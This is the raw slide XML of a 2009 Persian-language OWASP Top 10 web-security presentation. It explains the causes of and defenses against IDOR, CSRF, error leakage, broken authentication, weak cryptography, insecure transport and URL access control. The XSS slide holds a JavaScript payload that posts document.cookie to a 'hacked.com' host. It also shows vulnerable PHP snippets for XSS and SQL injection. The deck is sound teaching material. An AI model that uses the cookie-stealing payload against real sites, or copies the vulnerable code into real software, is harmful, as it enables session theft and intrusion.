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1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1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rtl="1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rtl="1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6754394-7B47-4840-BF3E-E501F40A3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3DF7B3-EEB0-4201-82A7-F2C94C09B89C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68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083348-44E0-43AB-A47C-373AB6973A98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995A223-CB76-4CAF-82A6-6600FDE3D9AB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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17DD36-0E48-4007-A067-F5AAB0BE01C5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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F6DF4F-7C5C-4E1D-8F4E-CA11E96F3C3C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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7D0382-7DB2-4911-B9E6-68CD5C1C47EE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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AEAF98-B4CE-4350-9B5F-55C3A097EBEA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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880BB1-7462-4D9E-A884-82AFA7BE9CCB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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706A36-A7F2-44D7-BCE6-86DFD138EBB1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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3BC0A6-E931-4ECF-9DAD-F115904AC056}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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88F333-8948-4F9C-B5EC-72337BF99C23}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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8F962F-929E-4500-8AA4-2DAC7D157D03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70C91C-B4D6-440F-A42A-EEB537EBFFC3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76938E-2263-4F32-BEAE-1082555EC756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C4B184-0396-452F-BE4F-1587FE037A82}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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E66411-5ECC-4E17-9539-C720F7D7BB74}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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22EEF4-7E3B-4A93-B61F-E3C852DCA47A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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469B4C-E82A-42CE-9684-0ABCA1A03BCB}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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2BECB3-0D10-4914-ACC6-8970702A8CCB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FE83C2-6A02-4CC6-BC2B-2CA796410585}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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46C62D-5401-42BE-8E7B-985906183B01}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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0E1758-2E9E-499D-BD70-54EC60FF834F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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7E8E83-C481-4FCC-BC32-F082A1C073E8}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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35D162-3E38-4367-904F-FB4D606C74EF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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B94E0E-637E-4284-8959-8EAC4A491ADA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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0DA6E8-5E5E-4D6A-9C5F-61323DA16C29}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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CACDC1-E480-4A9A-856B-BFF37C9D77B9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629C9B-22E1-44F1-A665-FC9655A658E2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DD6B97-3EB1-49C9-AADC-0336DE196E59}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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8D0298-5A34-4E19-B436-CBADD95AD870}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/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5C60D5-0DFD-4467-9F33-E8AF24FE7ACF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0D7EB5-5603-4781-949C-D8A8F1472538}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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B731-8811-420D-9BCE-C69C74B37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CCA5-95DB-4E6D-87A3-BCF123914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CAB41-231B-4C41-91C2-2CFB2F48A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3621-2664-4721-B9AB-3B4E6C55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FAE7C-7F20-4AE7-BE35-7FDA8D2FF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0"/>
            <a:ext cx="2170113" cy="5367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362700" cy="5367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0"/>
            <a:ext cx="5865813" cy="190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08C0-09F3-43D5-84BF-316DA51F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9443-513F-46E7-8D9F-F3176D2EE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21B4-A10D-467E-898D-ABD6D8D36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439A-901A-4D0C-BC65-9BD860BA8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EFC0D-E802-49F1-94C2-43C9DA200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287-32FF-4472-9E2B-1652B73BC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795F-5AC8-47EE-ACD2-4D42B3EA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C99C322-4D68-4111-881A-EE91113B4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pitchFamily="34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pitchFamily="34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pitchFamily="34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pitchFamily="34" charset="0"/>
          <a:ea typeface="MS Gothic" charset="0"/>
          <a:cs typeface="MS Gothic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pitchFamily="34" charset="0"/>
          <a:ea typeface="MS Gothic" charset="0"/>
          <a:cs typeface="MS Gothic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pitchFamily="34" charset="0"/>
          <a:ea typeface="MS Gothic" charset="0"/>
          <a:cs typeface="MS Gothic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pitchFamily="34" charset="0"/>
          <a:ea typeface="MS Gothic" charset="0"/>
          <a:cs typeface="MS Gothic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pitchFamily="34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762000"/>
            <a:ext cx="5865813" cy="190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70865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038600" y="5165725"/>
            <a:ext cx="41910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>
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Copyright © The OWASP Foundation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OWASP License.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5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038600" y="5937250"/>
            <a:ext cx="4800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>
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The OWASP Foundation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65" name="Freeform 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="270510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66" name="Freeform 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000">
            <a:off x="7385050" y="2668588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524000" y="4229100"/>
            <a:ext cx="2667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>
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP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038600" y="6326188"/>
            <a:ext cx="4800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u="sng">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="EAEAEA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7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usx@jframework.inf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276600" y="762000"/>
            <a:ext cx="4824413" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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600" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>امنیت نرم‌افزارهای وب</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="777777"/>
              </a:solidFill>
              <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Roya" pitchFamily="2" charset="-7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038600" y="3260725"/>
            <a:ext cx="4648200" cy="1873250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90000" tIns="46800" rIns="90000" bIns="46800"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1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1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="XB Zar" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Zar" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1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1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="XB Zar" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Zar" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>عباس نادری</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="XB Zar" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Zar" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1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err="1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Abbas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0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Naderi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0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(aka </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1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AbiusX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0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eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1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1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="XB Zar" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Zar" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اعتباران </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ar-SA" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="XB Zar" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Zar" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>انفورماتیک</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="XB Zar" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Zar" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1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abiusx@etebaran.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1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abiusx@jframework.info</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="1600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marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="1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abiusx@owasp.org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549400" y="4648200"/>
            <a:ext cx="112432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777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10/1/2009</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="777777"/>
              </a:solidFill>
              <a:latin typeface="Tahoma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777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>۱۳۸۸</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>۷</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7777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0" y="6072206"/>
            <a:ext cx="38576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fa-IR" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFC12"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>تقديم به پيشگاه مقدس امام عصر </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2200" b="1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFC12"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>(عج)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-CA" sz="2200" b="1" baseline="30000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFC12"/>
              </a:solidFill>
              <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Roy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396875" algn="l"/>
                <a:tab pos="752475" algn="l"/>
                <a:tab pos="1106488" algn="l"/>
                <a:tab pos="1462088" algn="l"/>
                <a:tab pos="1819275" algn="l"/>
                <a:tab pos="2174875" algn="l"/>
                <a:tab pos="2528888" algn="l"/>
                <a:tab pos="2884488" algn="l"/>
                <a:tab pos="3241675" algn="l"/>
                <a:tab pos="3597275" algn="l"/>
                <a:tab pos="3952875" algn="l"/>
                <a:tab pos="4306888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4. Insecure Direct Object Reference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ارائه اطلاعات ناخواسته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60363" y="1955800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عدم آگاهی توسعه‌دهندگان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پیچیدگی یافت و جلوگیری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پیش‌آمدن قطعی در سیستم‌های پیچیده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بسیار زمانگیر و دشوار جهت کشف برای نفوذگران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4. Insecure Direct Object Reference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تعیین دقیق معماری سیستم و پیروی از آن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مشخص کردن لایه تعیین دسترسی به همه چیز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پیاده‌سازی صحیح روشها و پیروی از معماری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396875" algn="l"/>
                <a:tab pos="752475" algn="l"/>
                <a:tab pos="1106488" algn="l"/>
                <a:tab pos="1462088" algn="l"/>
                <a:tab pos="1819275" algn="l"/>
                <a:tab pos="2174875" algn="l"/>
                <a:tab pos="2528888" algn="l"/>
                <a:tab pos="2884488" algn="l"/>
                <a:tab pos="3241675" algn="l"/>
                <a:tab pos="3597275" algn="l"/>
                <a:tab pos="3952875" algn="l"/>
                <a:tab pos="4306888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5.Cross Site Request Forgery (CSRF)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جعل درخواست بین سایتی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60363" y="1955800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عدم علم توسعه‌دهندگان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عدم درک صحیح توسعه‌دهندگان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بسیار ساده و قابل انجام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می‌تواند به غایت حساس و خطرناک باشد یا نه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کاربری معمول به سادگی برطرف می‌شود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موارد پیچیده احتیاج به پردازش خروجی دارند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5.Cross Site Request Forgery (CSRF)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عدم استفاده از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GET </a:t>
            </a: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برای فرآیندها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جفتگیری تصادفی در کلاینت و سرور نااتوماتیک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فرم ورود به سیستم مجدد در فرآیند حساس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جلوگیری از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XSS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396875" algn="l"/>
                <a:tab pos="752475" algn="l"/>
                <a:tab pos="1106488" algn="l"/>
                <a:tab pos="1462088" algn="l"/>
                <a:tab pos="1819275" algn="l"/>
                <a:tab pos="2174875" algn="l"/>
                <a:tab pos="2528888" algn="l"/>
                <a:tab pos="2884488" algn="l"/>
                <a:tab pos="3241675" algn="l"/>
                <a:tab pos="3597275" algn="l"/>
                <a:tab pos="3952875" algn="l"/>
                <a:tab pos="4306888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6. Information Leakage and Improper Error Handling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نشت اطلاعات و نقص مدیریت خطا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60363" y="1955800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قدم اول انواع نفوذ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تقریبا تمام سیستم‌ها آسیب پذیرند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اهمیت آن معمولا درنظر گرفته نمی‌شود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آگاهی نسبتا کامل از سیستم با</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 </a:t>
            </a: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Stack Trace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یا</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 </a:t>
            </a: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SQL</a:t>
            </a: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روش‌های مقابله اتوماتیک ناکارآمد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روش‌های مقابله دستی بسیار کند و هزینه‌بر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6. Information Leakage and Improper Error Handling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عدم ارائه خطا و ارور در سیستم عملیاتی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تهیه گزارش کامل از همه عملکردهای سیستم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تماس با مدیر و امنیت از طریق ای‌میل یا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SMS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بررسی دقیق و تست کامل محصول قبل‌از ارائه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 سیستم‌های اتوماتیک و تنظیم سکو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396875" algn="l"/>
                <a:tab pos="752475" algn="l"/>
                <a:tab pos="1106488" algn="l"/>
                <a:tab pos="1462088" algn="l"/>
                <a:tab pos="1819275" algn="l"/>
                <a:tab pos="2174875" algn="l"/>
                <a:tab pos="2528888" algn="l"/>
                <a:tab pos="2884488" algn="l"/>
                <a:tab pos="3241675" algn="l"/>
                <a:tab pos="3597275" algn="l"/>
                <a:tab pos="3952875" algn="l"/>
                <a:tab pos="4306888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7. Broken Authentication and Session Management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احراز هویت و مدیریت نشست ناکارا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60363" y="1955800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بسیار بد و آسیب زننده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احتیاج به بازنگری دائم و فراوان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نقص در روش‌های احراز هویت غیراستاندارد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پیاده‌سازی دشوار و حساس در سیستم‌های بزرگ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7. Broken Authentication and Session Management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 یک محور احرازهویت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ایجاد نشست‌های مستقل پس‌از احراز هویت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خروج از سیستم کارا و تخلیه اطلاعات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عدم ارائه اطلاعات نشستی و حساس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 سیستم‌های بالغ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تست و بررسی کد به صورت کامل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>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="XB Roya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396875" algn="l"/>
                <a:tab pos="752475" algn="l"/>
                <a:tab pos="1106488" algn="l"/>
                <a:tab pos="1462088" algn="l"/>
                <a:tab pos="1819275" algn="l"/>
                <a:tab pos="2174875" algn="l"/>
                <a:tab pos="2528888" algn="l"/>
                <a:tab pos="2884488" algn="l"/>
                <a:tab pos="3241675" algn="l"/>
                <a:tab pos="3597275" algn="l"/>
                <a:tab pos="3952875" algn="l"/>
                <a:tab pos="4306888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8. Insecure Cryptographic Storage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استفاده نادرست از رمزنگاری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60363" y="1955800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بسیار معمول و خطرناک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اکثر توسعه‌دهندگان و تیم آنها دانش رمزنگاری ندارند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تکیه کامل بر رمزنگاری ناصحیح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نفوذگران معدودی دانش رمزنگاری کافی دارند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8. Insecure Cryptographic Storage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dirty="0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بررسی کد (تست پاسخگو نیست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(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin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عدم استفاده از الگوریتم‌های دستی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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آموزش استفاده صحیح از الگوریتم‌های قدرتمند</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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عدم استفاده از الگوریتم‌های منسوخ (مانند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MD5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin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عدم استفاده از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</a:rPr>
              <a:t>Hard Coding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578225"/>
            <a:ext cx="7772400" cy="11461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b="1" smtClean="0">
                <a:latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>امنیت دنیای وب</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"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876800"/>
            <a:ext cx="6400800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr"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mtClean="0">
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>سهل انگاری در اوج اهمیت</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Roya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396875" algn="l"/>
                <a:tab pos="752475" algn="l"/>
                <a:tab pos="1106488" algn="l"/>
                <a:tab pos="1462088" algn="l"/>
                <a:tab pos="1819275" algn="l"/>
                <a:tab pos="2174875" algn="l"/>
                <a:tab pos="2528888" algn="l"/>
                <a:tab pos="2884488" algn="l"/>
                <a:tab pos="3241675" algn="l"/>
                <a:tab pos="3597275" algn="l"/>
                <a:tab pos="3952875" algn="l"/>
                <a:tab pos="4306888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9. Insecure Communications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ارتباطات ناامن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60363" y="1955800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هزینه‌بر و احتیاج به صرف اعتبار جهت کسب اعتبار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بار بیشتر بر روی سرورها و کلاینت‌ها (نامطلوب</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin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عدم درک صحیح از عمق مسئله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راه‌اندازی دشوار بر سرور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آموزش دشوار در کلاینت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9. Insecure Communications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dirty="0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</a:rPr>
              <a:t>SSL </a:t>
            </a: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در تمام ارتباطات هویت‌دار</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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</a:rPr>
              <a:t>SSL </a:t>
            </a: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در تمام فرآیندهای حساس</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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 گواهینامه معتبر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</a:rPr>
              <a:t>SSL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 نسخه معتبر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</a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>،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نسخه </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR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۳</a:t>
            </a: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یا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XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>TLS 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منطق عدم ارائه اطلاعات حساس در ارتباط ناامن توسط برنامه کنترل شود</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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396875" algn="l"/>
                <a:tab pos="752475" algn="l"/>
                <a:tab pos="1106488" algn="l"/>
                <a:tab pos="1462088" algn="l"/>
                <a:tab pos="1819275" algn="l"/>
                <a:tab pos="2174875" algn="l"/>
                <a:tab pos="2528888" algn="l"/>
                <a:tab pos="2884488" algn="l"/>
                <a:tab pos="3241675" algn="l"/>
                <a:tab pos="3597275" algn="l"/>
                <a:tab pos="3952875" algn="l"/>
                <a:tab pos="4306888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10. Failure to Restrict URL Access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ناتوانی در محدود کردن دسترسی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60363" y="1955800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متدولوژی غلط</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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 </a:t>
            </a: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Security by Obscurity</a:t>
            </a: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عدم استفاده از کنترل دسترسی محوری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کنترل دسترسی ناصحیح (مثلا بر روی کلاینت</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR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)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin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00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latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>دشواری پیاده‌سازی و استفاده از روش‌های استاندارد</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              <a:cs typeface="XB Kayh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10. Failure to Restrict URL Access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 روشهای استاندارد و کارا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(‌RBAC)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اعمال اتوماتیک مکانیزم کنترل دسترسی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بررسی کد کامل و معماری کارآمد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عدم استفاده از آدرس‌های مخفی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578225"/>
            <a:ext cx="7772400" cy="11461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b="1" smtClean="0">
                <a:latin typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Kayhan" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>چند راه‌برد عملی</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"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876800"/>
            <a:ext cx="6400800" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" rtl="1"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mtClean="0">
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
                <a:cs typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پیاده‌روی در اعماق باتلاق</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78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254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Cross Site Scripting (XSS)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29600" cy="5046663"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="341313" indent="-341313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echo $_REQUEST['userinput'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313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Reflected, Stored and DOM types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313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>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>docoment.write('&lt;form name='f1' action=''hacked.com''&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>&lt;input name=''sessionID'' value='' '+document.cookie+' '' /&gt;&lt;/form&gt;');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313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>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>document.forms.f1.submit();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254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SQL Injection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29600" cy="5046663"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="E6E6E6"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="341313" indent="-341313"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$sql = "SELECT * FROM table WHERE id = ' " . $_GET['id'] . " ' ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34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Text fields, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="XB Roya" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Number Fields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!!!</a:t>
